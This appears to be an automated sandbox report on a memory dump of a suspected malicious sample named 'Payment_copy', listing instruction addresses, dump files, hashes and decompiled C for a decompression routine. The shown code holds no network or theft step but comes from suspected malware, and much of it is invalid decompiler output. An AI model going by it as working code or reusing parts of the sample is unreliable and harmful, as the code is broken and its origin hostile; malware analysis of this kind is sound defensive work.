0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x00000000
0x0040699c
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00000000
0x00406b0f
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00000000
0x00406964
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
